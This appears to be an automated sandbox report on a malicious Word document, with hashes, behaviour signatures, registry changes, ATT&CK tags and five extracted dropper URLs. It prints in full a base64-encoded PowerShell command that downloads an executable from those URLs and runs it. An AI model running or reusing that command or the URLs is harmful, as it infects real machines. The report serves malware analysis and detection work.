608ee8e057af25aa01d6449635cdb3e8fe78f8ca85e7482476171fbba8346514

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ed97c23ae28330668ac7857640f8e9d1_JaffaCakes118.doc
Size

202KB
MD5

ed97c23ae28330668ac7857640f8e9d1
SHA1

c80fa96e145290028cb144657c0f2e357e524df3
SHA256

608ee8e057af25aa01d6449635cdb3e8fe78f8ca85e7482476171fbba8346514
SHA512

11b113bb1090d6b3974a66300de9dd5e12a9b2a5a1abed974e4971d6ad6a479d03416ac7b7a054bd0f8f0bc5c5cba2daa7d4894f8dc053b3ecfaedcb71271a9e
SSDEEP

3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUgNf6EOpwm53Rt:Z2k4NtGiL3HJk9yD7bkf6Eqwm53Rt

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://femminent.com/wp/UqU/

exe.dropper

http://liberty.blvrdev.com/stats/bLH/

exe.dropper

http://milkteaway.azurewebsites.net/calendar/bNmo99828/

exe.dropper

http://nehashetty.xyz/wp-admin/vNWZ/

exe.dropper

http://storeofofficial.shop/pokjbg746ihrtr/3u/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2408	2684	powersheLL.exe	32

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2408	powersheLL.exe
5	2408	powersheLL.exe
7	2408	powersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{F682F1A0-0FC0-4D4F-AEAB-BB85A6D5B37C}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F682F1A0-0FC0-4D4F-AEAB-BB85A6D5B37C}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F682F1A0-0FC0-4D4F-AEAB-BB85A6D5B37C}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F682F1A0-0FC0-4D4F-AEAB-BB85A6D5B37C}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2280	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2408	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2408	powersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2280	WINWORD.EXE
2280	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 2788	2280	WINWORD.EXE	31
PID 2280 wrote to memory of 2788	2280	WINWORD.EXE	31
PID 2280 wrote to memory of 2788	2280	WINWORD.EXE	31
PID 2280 wrote to memory of 2788	2280	WINWORD.EXE	31

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed97c23ae28330668ac7857640f8e9d1_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2788

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABEAHYAYwB3AG8AYQBmAGgAYQB4AGUAPQAnAEIAZwBhAG4AawBjAHkAbwBkAHkAegBpAHAAJwA7ACQAUQBvAG0AegBhAHoAbwB1AGEAIAA9ACAAJwAzADMANwAnADsAJABFAGoAbQBhAGIAbABoAHAAaQB2AGcAPQAnAFIAawBtAGMAcQB5AHQAegBiAGoAeAAnADsAJABYAHAAcABkAHIAZQBrAGgAbAB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAG8AbQB6AGEAegBvAHUAYQArACcALgBlAHgAZQAnADsAJABBAHcAYwBuAHkAcwBxAHIAdgBvAHMAbAB1AD0AJwBMAGYAbwB2AHMAeABsAG8AbgBnAHoAagB2ACcAOwAkAEsAaABiAHkAYwBzAHQAcQBqAHUAdwA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAEwAaQBlAE4AdAA7ACQAUgBqAGwAcQBrAHIAcgB2AD0AJwBoAHQAdABwADoALwAvAGYAZQBtAG0AaQBuAGUAbgB0AC4AYwBvAG0ALwB3AHAALwBVAHEAVQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAYgBlAHIAdAB5AC4AYgBsAHYAcgBkAGUAdgAuAGMAbwBtAC8AcwB0AGEAdABzAC8AYgBMAEgALwAqAGgAdAB0AHAAOgAvAC8AbQBpAGwAawB0AGUAYQB3AGEAeQAuAGEAegB1AHIAZQB3AGUAYgBzAGkAdABlAHMALgBuAGUAdAAvAGMAYQBsAGUAbgBkAGEAcgAvAGIATgBtAG8AOQA5ADgAMgA4AC8AKgBoAHQAdABwADoALwAvAG4AZQBoAGEAcwBoAGUAdAB0AHkALgB4AHkAegAvAHcAcAAtAGEAZABtAGkAbgAvAHYATgBXAFoALwAqAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBlAG8AZgBvAGYAZgBpAGMAaQBhAGwALgBzAGgAbwBwAC8AcABvAGsAagBiAGcANwA0ADYAaQBoAHIAdAByAC8AMwB1AC8AJwAuACIAcwBgAFAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABaAG8AYwBjAGwAbABtAHUAPQAnAFEAeQB3AHcAdQByAHcAagB1AG8AdgAnADsAZgBvAHIAZQBhAGMAaAAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAgAGkAbgAgACQAUgBqAGwAcQBrAHIAcgB2ACkAewB0AHIAeQB7ACQASwBoAGIAeQBjAHMAdABxAGoAdQB3AC4AIgBkAE8AdwBgAE4AbABPAGEAYABEAEYAaQBMAGUAIgAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAsACAAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEYAYgBvAGkAbwBoAHoAaQA9ACcAUgBvAGQAagBzAGQAbgB5ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWABwAHAAZAByAGUAawBoAGwAeQApAC4AIgBMAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADIAOAAxADIAMAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIAZQBhAFQARQAiACgAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEMAegBwAHIAdABvAGQAYQBhAD0AJwBGAG0AdwBhAHgAYwB5AG4AeAAnADsAYgByAGUAYQBrADsAJABXAGUAaABxAGkAZABmAGgAcABsAGQAdgA9ACcAWQBxAHYAcwB3AGgAdABhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAbQByAGcAawBhAHcAdABhAGcAPQAnAEoAYwBnAHoAdQB0AGwAdwBjAHIAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
5d98d90f3ca6b3609c38d173691754e4

SHA1
11f0b2c6ef237fd695df42000b7a65192fdd5a08

SHA256
5ef9bff72120efa61d49e29de857dd9792a7df37d53804adac2d50beb3d50c5e

SHA512
d04ed926c799e305753b0bb8c209be1d43a0b9287ed2055a5bb21ad26709ab5574e43594962d1465a531d46cc379fe0bcf5a1bf436314fbbbf2fc4e47f447650

Download Submit
memory/2280-22-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-43-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-5-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-7-0x0000000006750000-0x0000000006850000-memory.dmp

Filesize
1024KB

Download
memory/2280-23-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-12-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-11-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-10-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-9-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-17-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-13-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-2-0x000000007119D000-0x00000000711A8000-memory.dmp

Filesize
44KB

Download
memory/2280-18-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-27-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-28-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-33-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-32-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-61-0x000000007119D000-0x00000000711A8000-memory.dmp

Filesize
44KB

Download
memory/2280-60-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2280-41-0x000000007119D000-0x00000000711A8000-memory.dmp

Filesize
44KB

Download
memory/2280-42-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-0-0x000000002F0E1000-0x000000002F0E2000-memory.dmp

Filesize
4KB

Download
memory/2280-44-0x00000000003B0000-0x00000000004B0000-memory.dmp

Filesize
1024KB

Download
memory/2280-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2408-40-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/2408-39-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download